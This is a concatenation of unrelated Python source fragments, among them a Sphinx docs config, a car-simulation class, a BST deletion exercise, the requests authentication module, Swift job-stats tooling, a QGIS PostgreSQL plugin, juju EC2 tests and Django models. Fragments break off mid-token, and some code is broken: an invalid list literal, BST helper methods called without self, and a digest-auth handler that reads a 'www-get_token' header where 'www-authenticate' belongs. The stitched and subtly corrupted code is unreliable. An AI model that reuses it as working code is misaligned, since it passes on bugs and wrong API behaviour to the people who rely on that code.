of the Pygments (syntax highlighting) style to use. pygments_style = 'native' # A list of ignored prefixes for module index sorting. modindex_common_prefix = ['neutron_vpnaas.'] # -- Options for man page output -------------------------------------------- # Grouping the document tree for man pages. # List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual' #man_pages = [ # ('man/neutron-server', 'neutron-server', u'Neutron Server', # [u'OpenStack'], 1) #] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. # html_theme_path = ["."] # html_theme = '_theme' html_theme = 'openstackdocs' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = ['_theme'] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_use_modindex = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. #htmlhelp_basename = 'neutrondoc' # -- Options for LaTeX output ------------------------------------------------ # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, # documentclass [howto/manual]). latex_documents = [ ('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation', u'Neutron development team', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_use_modindex = True # Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664 latex_use_xindy = False latex_domain_indices = False latex_elements = { 'extraclassoptions': 'openany,oneside', 'makeindex': '', 'printindex': '', 'preamble': r'\setcounter{tocdepth}{3}', } # -- Options for openstackdocstheme ------------------------------------------- openstackdocs_repo_name = 'openstack/neutron-vpnaas' openstackdocs_pdf_link = True openstackdocs_auto_name = False openstackdocs_bug_project = 'neutron' openstackdocs_bug_tag = 'doc' # -- Options for oslo_config.sphinxconfiggen --------------------------------- _config_generator_config_files = [ 'vpn_agent.ini', 'neutron_vpnaas.conf', ] def _get_config_generator_config_definition(conf): config_file_path = '../../etc/oslo-config-generator/%s' % conf # oslo_config.sphinxconfiggen appends '.conf.sample' to the filename, # strip file extentension (.conf or .ini). output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0] return (config_file_path, output_file_path) config_generator_config_file = [ _get_config_generator_config_
# -*- coding: utf8 -*- import logging import math from Graphx import graphx from GameEngine.GameObjects.gameObjectBehaviour import GameObjectBehaviour from Brains.human import HumanBrain from conf import conf class CarBehaviour(GameObjectBehaviour): brainTypes = { 'human': HumanBrain } """ Behaviour of the car. It handles the car at its current position. """ def __init__(self, brainType, ruleChecker, model): """ Initialize a new Behaviour object for the car. It needs a brain which will take the actual decisions of the actions, and the model that holds the state history """ super(CarBehaviour, self).__init__(model) self._brain = CarBehaviour.brainTypes[brainType](model) self._ruleChecker = ruleChecker self._newVelocity = None self._newPosition = None self._newHeading = None self._actions = { 'accelerate': self.accelerate, 'break': self.breaks, 'turnRight': self.turnRight, 'turnLeft': self.turnLeft, 'halt': self.halt } def move(self): """ set the new position of the car using the current velocity and the current heading """ self._newPosition = \ (self._model.position[0] + self._newVelocity * self._model.headingVector[0], self._model.position[1] + self._newVelocity * self._model.headingVector[1]) def halt(self): """ If this action is called at this turn, the velocity and the heading stay the same """ self._newVelocity = self._model.velocity self._newHeading = self._model.headingAngle self.move() def accelerate(self): """ Increase the velocity by the car's acceleration If max_speed is reached, the car simply keep its current speed. The heading does not change """ self._newVelocity = \ self._model.velocity + self._model.constant('acceleration') if self._newVelocity > self._model.constant('max_speed'): self._newVelocity = self._model.constant('max_speed') self._newHeading = self._model.headingAngle self.move() def breaks(self): """ Breaks using the car's break constant. If the car is already stopped, nothing happen. The heading does not change """ self._newVelocity = \ self._model.velocity - self._model.constant('break') if self._newVelocity < 0: self._newVelocity = 0 self._newHeading = self._model.headingAngle self.move() def turnRight(self): """ Turn right relatively to the car's hea
ding using the car's maniability. The velocity does not change """ self._newHeading = self._model.headingAngle - \ self._model.constant('maniability') self._newVelocity = self._model.velocity self.move() def turnLeft(self): """ Turn left relatively to the car'
s heading using the car's maniability The velocity does not change """ self._newHeading = self._model.headingAngle + \ self._model.constant('maniability') self._newVelocity = self._model.velocity self.move() def update(self, stateManager): """ Use the brain the take the decision about what is the next action, then update the model according to what has been decided. """ decision = self._brain.decision() self._actions[decision]() self._model.rotate(self._newHeading) self._model.velocity = self._newVelocity self._model.position = self._newPosition # self._ruleChecker.check(self._model.getCurrentState(), # self._model.getPreviousState())
#!/usr/bin/env python3 # Given a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST. # Basically, the deletion can be divided into two stages: # Search for a node to remove. # If the node is found, delete the node. # Note: Time complexity should be O(height of tree). # Example: # root = [5,3,6,2,4,null,7] # key = 3 # 5 # / \ # 3 6 # / \ \ # 2 4 7 # Given key to delete is 3. So we find the node with value 3 and delete it. # One valid answer is [5,4,6,2,null,null,7], shown in the following BST. # 5 # / \ # 4 6 # / \ # 2 7 # Another valid answer is [5,2,6,null,4,null,7]. # 5 # / \ # 2 6 # \ \ # 4 7 # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right from tree import * class Solution: def deleteNode(self, root: TreeNode, key: int) -> TreeNode: if root == None: return None if key < root.val: root.left = self.deleteNode(root.left, key) elif key > root.val: root.right = self.deleteNode(root.right, key) else: node = root if node.left == None: return node.right root = self.getmax(node.left) # print(f'find new root: {root.val}')
root.left = self.deletemax(node.left) root.right = node.right return root def getmax(self, root): if root == None or root.right == None: return root return getmax(root.right) def deletemax(self, root): if root == None: return None if root.right == None: return root.left root.right = deletemax(root.right) return root nodeString = '[5,3,6,2,4,null,7]'
sol = Solution() root = treeBuilder(nodeString) print('lala') traverse(sol.deleteNode(root, 3))
# -*- coding: utf-8 -*- """ requests.auth ~~~~~~~~~~~~~ This module contains the authentication handlers for Requests. """ import os import re import time import hashlib from base64 import b64encode from .compat import urlparse, str from .cookies import extract_cookies_to_jar from .utils import parse_dict_header CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded' CONTENT_TYPE_MULTI_PART = 'multipart/form-data' def _basic_auth_str(username, password): """Returns a Basic Auth string.""" return 'Basic ' + b64encode(('%s:%s' % (username, password)).encode('latin1')).strip().decode('latin1') class AuthBase(object): """Base class that all auth implementations derive from""" def __call__(self, r): raise NotImplementedError('Auth hooks must be callable.') class HTTPBasicAuth(AuthBase): """Attaches HTTP Basic Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password def __call__(self, r): r.headers['Authorization'] = _basic_auth_str(self.username, self.password) return r class HTTPProxyAuth(HTTPBasicAuth): """Attaches HTTP Proxy Authentication to a given Request object.""" def __call__(self, r): r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password) return r class HTTPDigestAuth(AuthBase): """Attaches HTTP Digest Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password self.last_nonce = '' self.nonce_count = 0 self.chal = {} self.pos = None def build_digest_header(self, method, url): realm = self.chal['realm'] nonce = self.chal['nonce'] qop = self.chal.get('qop') algorithm = self.chal.get('algorithm') opaque = self.chal.get('opaque') if algorithm is None: _algorithm = 'MD5' else: _algorithm = algorithm.upper() # lambdas assume digest modules are imported at the top level if _algorithm == 'MD5' or _algo
rithm == 'MD5-SESS': def md5_utf8(x): if isinstance(x, str): x = x.encode('utf-8') return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8 elif _algorithm == 'SHA': def sha_utf8(x): if isinstance(x, str): x = x.encode('utf-8') return hashlib.sha1(x).hexdigest() hash_utf8 = sha_utf8 KD = lambda s, d: hash_utf8("%s:%s" % (s, d)) if hash_utf8 is None: return None # XXX not implemented yet entdig = None p_parsed = urlparse(url) path = p_parsed.path if p_parsed.query: path += '?' + p_parsed.query A1 = '%s:%s:%s' % (self.username, realm, self.password) A2 = '%s:%s' % (method, path) HA1 = hash_utf8(A1) HA2 = hash_utf8(A2) if nonce == self.last_nonce: self.nonce_count += 1 else: self.nonce_count = 1 ncvalue = '%08x' % self.nonce_count s = str(self.nonce_count).encode('utf-8') s += nonce.encode('utf-8') s += time.ctime().encode('utf-8') s += os.urandom(8) cnonce = (hashlib.sha1(s).hexdigest()[:16]) noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2) if _algorithm == 'MD5-SESS': HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce)) if qop is None: respdig = KD(HA1, "%s:%s" % (nonce, HA2)) elif qop == 'auth' or 'auth' in qop.split(','): respdig = KD(HA1, noncebit) else: # XXX handle auth-int. return None self.last_nonce = nonce # XXX should the partial digests be encoded too? base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \ 'response="%s"' % (self.username, realm, nonce, path, respdig) if opaque: base += ', opaque="%s"' % opaque if algorithm: base += ', algorithm="%s"' % algorithm if entdig: base += ', digest="%s"' % entdig if qop: base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce) return 'Digest %s' % (base) def handle_401(self, r, **kwargs): """Takes the given response and tries digest-auth, if needed.""" if self.pos is not None: # Rewind the file position indicator of the body to where # it was to resend the request. r.request.body.seek(self.pos) num_401_calls = getattr(self, 'num_401_calls', 1) s_auth = r.headers.get('www-get_token', '') if 'digest' in s_auth.lower() and num_401_calls < 2: setattr(self, 'num_401_calls', num_401_calls + 1) pat = re.compile(r'digest ', flags=re.IGNORECASE) self.chal = parse_dict_header(pat.sub('', s_auth, count=1)) # Consume content and release the original connection # to allow our new request to reuse the same one. r.content r.raw.release_conn() prep = r.request.copy() extract_cookies_to_jar(prep._cookies, r.request, r.raw) prep.prepare_cookies(prep._cookies) prep.headers['Authorization'] = self.build_digest_header( prep.method, prep.url) _r = r.connection.send(prep, **kwargs) _r.history.append(r) _r.request = prep return _r setattr(self, 'num_401_calls', 1) return r def __call__(self, r): # If we have a saved nonce, skip the 401 if self.last_nonce: r.headers['Authorization'] = self.build_digest_header(r.method, r.url) try: self.pos = r.body.tell() except AttributeError: pass r.register_hook('response', self.handle_401) return r
ssert(self.is_driver_job()) return self.stats.get("Driver.NumDriverJobsSkipped", 0) def driver_jobs_total(self): """Return the total count of a driver job's ran + skipped sub-jobs""" assert(self.is_driver_job()) return self.driver_jobs_ran() + self.driver_jobs_skipped() def merged_with(self, other, merge_by="sum"): """Return a new JobStats, holding the merger of self and other""" merged_stats = {} ops = {"sum": lambda a, b: a + b, # Because 0 is also a sentinel on counters we do a modified # "nonzero-min" here. Not ideal but best we can do. "min": lambda a, b: (min(a, b) if a != 0 and b != 0 else max(a, b)), "max": lambda a, b: max(a, b)} op = ops[merge_by] for k, v in self.stats.items() + other.stats.items(): if k in merged_stats: merged_stats[k] = op(v, merged_stats[k]) else: merged_stats[k] = v merged_kind = self.jobkind if other.jobkind != merged_kind: merged_kind = "<merged>" merged_module = self.module if other.module != merged_module: merged_module = "<merged>" merged_start = min(self.start_usec, other.start_usec) merged_end = max(self.start_usec + self.dur_usec, other.start_usec + other.dur_usec) merged_dur = merged_end - merged_start return JobStats(merged_kind, random.randint(0, 1000000000), merged_module, merged_start, merged_dur, self.jobargs + other.jobargs, merged_stats) def prefixed_by(self, prefix): prefixed_stats = dict([((prefix + "." + k), v) for (k, v) in self.stats.items()]) return JobStats(self.jobkind, random.randint(0, 1000000000), self.module, self.start_usec, self.dur_usec, self.jobargs, prefixed_stats) def divided_by(self, n): divided_stats = dict([(k, v / n) for (k, v) in self.stats.items()]) return JobStats(self.jobkind, random.randint(0, 1000000000), self.module, self.start_usec, self.dur_usec, self.jobargs, div
ided_stats) def incrementality_percentage(self): """Assuming the job is a driver job, return the amoun
t of jobs that actually ran, as a percentage of the total number.""" assert(self.is_driver_job()) ran = self.driver_jobs_ran() total = self.driver_jobs_total() return round((float(ran) / float(total)) * 100.0, 2) def to_catapult_trace_obj(self): """Return a JSON-formattable object fitting chrome's 'catapult' trace format""" return {"name": self.module, "cat": self.jobkind, "ph": "X", # "X" == "complete event" "pid": self.jobid, "tid": 1, "ts": self.start_usec, "dur": self.dur_usec, "args": self.jobargs} def start_timestr(self): """Return a formatted timestamp of the job's start-time""" t = datetime.datetime.fromtimestamp(self.start_usec / 1000000.0) return t.strftime("%Y-%m-%d %H:%M:%S") def end_timestr(self): """Return a formatted timestamp of the job's end-time""" t = datetime.datetime.fromtimestamp((self.start_usec + self.dur_usec) / 1000000.0) return t.strftime("%Y-%m-%d %H:%M:%S") def pick_lnt_metric_suffix(self, metric_name): """Guess an appropriate LNT metric type for a given metric name""" if "BytesOutput" in metric_name: return "code_size" if "RSS" in metric_name or "BytesAllocated" in metric_name: return "mem" return "compile" def to_lnt_test_obj(self, args): """Return a JSON-formattable object fitting LNT's 'submit' format""" run_info = { "run_order": str(args.lnt_order), "tag": str(args.lnt_tag), } run_info.update(dict(args.lnt_run_info)) stats = self.stats return { "Machine": { "Name": args.lnt_machine, "Info": dict(args.lnt_machine_info) }, "Run": { "Start Time": self.start_timestr(), "End Time": self.end_timestr(), "Info": run_info }, "Tests": [ { "Data": [v], "Info": {}, "Name": "%s.%s.%s.%s" % (args.lnt_tag, self.module, k, self.pick_lnt_metric_suffix(k)) } for (k, v) in stats.items() ] } AUXPATSTR = (r"(?P<module>[^-]+)-(?P<input>[^-]+)-(?P<triple>[^-]+)" + r"-(?P<out>[^-]*)-(?P<opt>[^-]+)") AUXPAT = re.compile(AUXPATSTR) TIMERPATSTR = (r"time\.swift-(?P<jobkind>\w+)\." + AUXPATSTR + "\.(?P<timerkind>\w+)$") TIMERPAT = re.compile(TIMERPATSTR) FILEPATSTR = (r"^stats-(?P<start>\d+)-swift-(?P<kind>\w+)-" + AUXPATSTR + r"-(?P<pid>\d+)(-.*)?.json$") FILEPAT = re.compile(FILEPATSTR) def match_auxpat(s): m = AUXPAT.match(s) if m is not None: return m.groupdict() else: return None def match_timerpat(s): m = TIMERPAT.match(s) if m is not None: return m.groupdict() else: return None def match_filepat(s): m = FILEPAT.match(s) if m is not None: return m.groupdict() else: return None def load_stats_dir(path, select_module=[], select_stat=[], exclude_timers=False, merge_timers=False, **kwargs): """Loads all stats-files found in path into a list of JobStats objects""" jobstats = [] sre = re.compile('.*' if len(select_stat) == 0 else '|'.join(select_stat)) for root, dirs, files in os.walk(path): for f in files: mg = match_filepat(f) if not mg: continue # NB: "pid" in fpat is a random number, not unix pid. jobkind = mg['kind'] jobid = int(mg['pid']) start_usec = int(mg['start']) module = mg["module"] if len(select_module) != 0 and module not in select_module: continue jobargs = [mg["input"], mg["triple"], mg["out"], mg["opt"]] with open(os.path.join(root, f)) as fp: j = json.load(fp) dur_usec = 1 stats = dict() for (k, v) in j.items(): if sre.search(k) is None: continue if k.startswith('time.') and exclude_timers: continue tm = match_timerpat(k) if tm: v = int(1000000.0 * float(v)) if tm['jobkind'] == jobkind and \ tm['timerkind'] == 'wall': dur_usec = v if merge_timers: k = "time.swift-%s.%s" % (tm['jobkind'], tm['timerkind']) stats[k] = v e = JobStats(jobkind=jobkind, jobid=jobid, module=module, start_usec=start_usec, dur_usec=dur_usec, jobargs=jobargs, stats=stats) jobstats.append(e) return jobstats def merge_all_jobstats(jobstats, select_module=[], group_by_module=False, merge_by="sum", divide_by=1, **kwargs): """Does a pairwise merge of the elements of list of jobs""" m = None if len(select_module) > 0: jobstats = filter(lambda j: j.module in select_module, jobstats) if group_by_module: def keyfunc(j): ret
from models import db from models.Post import Post class PostFile(db.Model): __tablename__ = 'PostFile' Id = db.Column
(db.Integer, primary_key = True) Post = db.Column(db.Integer, db.ForeignKey(Post.Id)) FileName = db.Column(db.String(128)) def __init__(self, post, file):
self.Post = post self.FileName = file
# -*- coding: utf-8 -*- """ Created on Fri Jun 25 16:20:12 2015 @author: Balázs Hidasi @lastmodified: Loreto Parisi (loretoparisi at gmail dot com) """ import sys import os import numpy as np import pandas as pd import datetime as dt # To redirect output to file class Logger(object): def __init__(self, filename="Default.log"): self.terminal = sys.stdout self.log = open(filename, "a") def write(self, message): self.terminal.write(message) self.log.write(message) def flush(self): pass sys.stdout = Logger( os.environ['HOME' ] + '/theano.log' ) PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/' PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/' data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64}) data.columns = ['SessionId', 'TimeStr', 'ItemId'] data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter. del(data['TimeStr']) session_lengths = data.groupby('SessionId').size() data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)] item_supports = data.groupby('ItemId').size() data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)] session_lengths = data.groupby('SessionId').size() data = data[np.in1d(data.Sessi
onId, session_lengths[session_lengths>=2].index)] tmax = data.Time.max() session_max_times = data.groupby('SessionId').Time.max() session_train = session_max_times[session_max_times < tmax-86400].index session_test = session_max_times[session_max_times >= tmax-86400].index train = data[np.in1d(data.
SessionId, session_train)] test = data[np.in1d(data.SessionId, session_test)] test = test[np.in1d(test.ItemId, train.ItemId)] tslength = test.groupby('SessionId').size() test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)] print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique())) train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False) print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique())) test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False) tmax = train.Time.max() session_max_times = train.groupby('SessionId').Time.max() session_train = session_max_times[session_max_times < tmax-86400].index session_valid = session_max_times[session_max_times >= tmax-86400].index train_tr = train[np.in1d(train.SessionId, session_train)] valid = train[np.in1d(train.SessionId, session_valid)] valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)] tslength = valid.groupby('SessionId').size() valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)] print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique())) train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False) print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique())) valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)
a = [
1 2 3
]
om .data_model import PGSqlResultModel return PGSqlResultModel(self, sql, parent) def registerDatabaseActions(self, mainWindow): Database.registerDatabaseActions(self, mainWindow) # add a separator separator = QAction(self) separator.setSeparator(True) mainWindow.registerAction(separator, self.tr("&Table")) action = QAction(self.tr("Run &Vacuum Analyze"), self) mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot) action = QAction(self.tr("Run &Refresh Materialized View"), self) mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot) def runVacuumAnalyzeActionSlot(self, item, action, parent): QApplication.restoreOverrideCursor() try: if not isinstance(item, Table) or item.isView: parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), QgsMessageBar.INFO, parent.iface.messageTimeout()) return finally: QApplication.setOverrideCursor(Qt.WaitCursor) item.runVacuumAnalyze() def runRefreshMaterializedViewSlot(self, item, action, parent): QApplication.restoreOverrideCursor() try: if not isinstance(item, PGTable) or item._relationType != 'm': parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), QgsMessageBar.INFO, parent.iface.messageTimeout()) return finally: QApplication.setOverrideCursor(Qt.WaitCursor) item.runRefreshMaterializedView() def hasLowercaseFieldNamesOption(self): return True class PGSchema(Schema): def __init__(self, row, db): Schema.__init__(self, db) self.oid, self.name, self.owner, self.perms, self.comment = row class PGTable(Table): def __init__(self, row, db, schema=None): Table.__init__(self, db, schema) self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row self.isView = self._relationType in set(['v', 'm']) self.estimatedRowCount = int(self.estimatedRowCount) def runVacuumAnalyze(self): self.aboutToChange.emit() self.database().connector.runVacuumAnalyze((self.schemaName(), self.name)) # TODO: change only this item, not re-create all the tables in the schema/database self.schema().refresh() if self.schema() else self.database().refresh() def runRefreshMaterializedView(self): self.aboutToChange.emit() self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name)) # TODO: change only this item, not re-create all the tables in the schema/database self.schema().refresh() if self.schema() else self.database().refresh() def runAction(self, action): action = str(action) if action.startswith("vacuumanalyze/"): if action == "vacuumanalyze/run": self.runVacuumAnalyze() return True elif action.startswith("rule/"): parts = action.split('/')
rule_name = parts[1] rule_action = parts[2] msg = u"Do you want to %s rule %s?" % (rule_action, rule_name) QApplication.restoreOverrideCursor() try: if QMessageBox.question(None, self.
tr("Table rule"), msg, QMessageBox.Yes | QMessageBox.No) == QMessageBox.No: return False finally: QApplication.setOverrideCursor(Qt.WaitCursor) if rule_action == "delete": self.aboutToChange.emit() self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name)) self.refreshRules() return True elif action.startswith("refreshmaterializedview/"): if action == "refreshmaterializedview/run": self.runRefreshMaterializedView() return True return Table.runAction(self, action) def tableFieldsFactory(self, row, table): return PGTableField(row, table) def tableConstraintsFactory(self, row, table): return PGTableConstraint(row, table) def tableIndexesFactory(self, row, table): return PGTableIndex(row, table) def tableTriggersFactory(self, row, table): return PGTableTrigger(row, table) def tableRulesFactory(self, row, table): return PGTableRule(row, table) def info(self): from .info_model import PGTableInfo return PGTableInfo(self) def tableDataModel(self, parent): from .data_model import PGTableDataModel return PGTableDataModel(self, parent) def delete(self): self.aboutToChange.emit() if self.isView: ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm') else: ret = self.database().connector.deleteTable((self.schemaName(), self.name)) if not ret: self.deleted.emit() return ret class PGVectorTable(PGTable, VectorTable): def __init__(self, row, db, schema=None): PGTable.__init__(self, row[:-4], db, schema) VectorTable.__init__(self, db, schema) self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:] def info(self): from .info_model import PGVectorTableInfo return PGVectorTableInfo(self) def runAction(self, action): if PGTable.runAction(self, action): return True return VectorTable.runAction(self, action) class PGRasterTable(PGTable, RasterTable): def __init__(self, row, db, schema=None): PGTable.__init__(self, row[:-6], db, schema) RasterTable.__init__(self, db, schema) self.geomColumn, self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:] self.geomType = 'RASTER' def info(self): from .info_model import PGRasterTableInfo return PGRasterTableInfo(self) def gdalUri(self, uri=None): if not uri: uri = self.database().uri() schema = (u'schema=%s' % self.schemaName()) if self.schemaName() else '' dbname = (u'dbname=%s' % uri.database()) if uri.database() else '' host = (u'host=%s' % uri.host()) if uri.host() else '' user = (u'user=%s' % uri.username()) if uri.username() else '' passw = (u'password=%s' % uri.password()) if uri.password() else '' port = (u'port=%s' % uri.port()) if uri.port() else '' # Find first raster field col = '' for fld in self.fields(): if fld.dataType == "raster": col = u'column=%s' % fld.name break gdalUri = u'PG: %s %s %s %s %s mode=2 %s %s table=%s' % \ (dbname, host, user, passw, port, schema, col, self.name) return gdalUri def mimeUri(self): # QGIS has no provider for PGRasters, let's use GDAL uri = u"raster:gdal:%s:%s" % (self.name, re.sub(":", "\:", self.gdalUri())) return uri def toMapLayer(self): from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials rl = QgsRasterLayer(self.gdalUri(), self.name) if not rl.isValid(): err = rl.error().summary() uri = QgsDataSourceUri(self.database().uri()) conninfo = uri.connectionInfo(False) username = uri.username() password = uri.password() for i in range(3): (ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err) if ok: uri.setUsername(username) uri.setPassword(password) rl = QgsRasterLayer(self.gdalUri(uri), self.name) if rl.isValid():
from yaml import dump from twisted.internet.defer import succeed, fail from txaws.s3.exception import S3Error from juju.lib.testing import TestCase from juju.providers.ec2.tests.common import EC2TestMixin class EC2StateTest(TestCase, EC2TestMixin): def setUp(self): EC2TestMixin.setUp(self) super(EC2StateTest, self).setUp() def test_save(self): """ When passed some juju ec2 machine instances and asked to save, the machine, it will serialize the data to an s3 bucket. """ instances = [self.get_instance("i-foobar", dns_name="x1.example.com")] state = dump( {"zookeeper-instances": [[i.instance_id, i.dns_name] for i in instances]}) self.s3.put_object( self.env_name, "provider-state", state), self.mocker.result(succeed(state)) self.mocker.replay() provider = self.get_provider() d = provider.save_state( {"zookeeper-instances": [[i.instance_id, i.dns_name] for i in instances]}) def assert_state(saved_state): self.assertEqual(saved_state, state) d.addCallback(assert_state) return d def test_save_non_existant_bucket(self): """ When saving instance information to S3 the EC2 provider will create a namespaced bucket specific to the provider instance, if it does not already exist. """ instances = [self.get_instance("i-foobar", dns_name="x1.example.com")] state = dump( {"zookeeper-instances": [[i.instance_id, i.dns_name] for i in instances]}) self.s3.put_object( self.env_name, "provider-state", state), error = S3Error("<error/>", 404) error.errors = [{"Code": "NoSuchBucket"}] self.mocker.result(fail(error)) self.s3.create_bucket(self.env_name) self.mocker.result(succeed({})) self.s3.put_object( self.env_name, "provider-state", state), self.mocker.result(succeed(state)) self.mocker.replay() provider = self.get_provider() d = provider.save_state( {"zookeeper-instances": [[i.instance_id, i.dns_name] for i in instances]}) def assert_state(saved_state): self.assertEqual(saved_state, state) d.addCallback(assert_state) return d def test_load(self): """ The provider bootstrap will load and deserialize any saved state from s3. """ self.s3.get_object(self.env_name, "provider-state") self.mocker.result(succeed(dump({"zookeeper-instances": []}))) self.mocker.replay() provider = self.get_provider() d = provider.load_state() def assert_load_value(value): self.assertEqual(value, {"zookeeper-instances": []}) d.addCallback(assert_load_value) return d def test_load_nonexistant_bucket(self): """ When loading saved state from s3, the system returns False if the s3 control bucket does not exist. """ self.s3.get_object(self.env_name, "provider-state") error = S3Error("<error/>", 404) error.errors = [{"Code": "NoSuchBucket"}] self.mocker.result(fail(error)) self.mocker.replay() provider = self.get_provider() d = provider.load_state() def assert_load_value(value): self.assertIdentical(value, False) d.addCallback(assert_load_value) return d def test_load_nonexistant(self): "
"" When loading saved state from S3, the provider bootstrap gracefully handles the scenario where there is no saved state. """ self.s3.get_object(self.env_name, "provider-state") self.mocker.result(succeed(dump([]))) self.mocker.replay() provider = self.get_provider() d = provider.load_state() def assert_load_value(value): self.assertIdentical(value, False) d.addCallback(assert_load_valu
e) return d
from django.conf.urls import patterns, include, url from django.conf.urls.static import static from django.conf import settings
from django.contrib import admin urlpatterns = patterns('', # Examples: # url(r'^$', 'isucdc2.views.home', name='home'), # url(r'^blog/', include('blog.urls')), url(r'^admin/', include(admin.site.urls)), url(r'^', include('cdc.urls', namespace="cdc")), ) + static(settings.MEDIA_URL, document_root=se
ttings.MEDIA_ROOT)
""" 33. get_or_create() ``get_or_create()`` does what it says: it tries to look up an object with the given parameters. If an object isn't found, it creates one with the given parameters. """ from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class
Person(models.Model)
: first_name = models.CharField(max_length=100) last_name = models.CharField(max_length=100) birthday = models.DateField() def __str__(self): return '%s %s' % (self.first_name, self.last_name) class DefaultPerson(models.Model): first_name = models.CharField(max_length=100, default="Anonymous") class ManualPrimaryKeyTest(models.Model): id = models.IntegerField(primary_key=True) data = models.CharField(max_length=100) class Profile(models.Model): person = models.ForeignKey(Person, primary_key=True) class Tag(models.Model): text = models.CharField(max_length=255, unique=True) class Thing(models.Model): name = models.CharField(max_length=256) tags = models.ManyToManyField(Tag) class Publisher(models.Model): name = models.CharField(max_length=100) class Author(models.Model): name = models.CharField(max_length=100) class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author, related_name='books') publisher = models.ForeignKey(Publisher, related_name='books', db_column="publisher_id_column")
""" smashlib.plugins.cli_update The handler for "smash --update".
